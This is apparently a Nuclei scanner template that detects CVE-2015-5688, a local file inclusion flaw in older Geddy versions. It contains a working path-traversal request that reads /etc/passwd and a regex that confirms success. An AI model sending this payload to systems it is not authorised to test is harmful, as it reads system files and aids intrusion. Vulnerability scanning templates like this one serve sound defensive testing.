id: CVE-2015-5688

info:
 name: Geddy before v13.0.8 LFI
 author: pikpikcu
 severity: high
 issues: https://github.com/geddy/geddy/issues/697
 reference: https://nvd.nist.gov/vuln/detail/CVE-2015-5688
 tags: cve,cve2015,geddy,lfi

requests:
 - method: GET
   path:
    - "{{BaseURL}}/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"

   matchers-condition: and
   matchers:
    - type: regex
      regex:
       - "root:[x*]:0:0"
      part: body

    - type: status
      status:
       - 200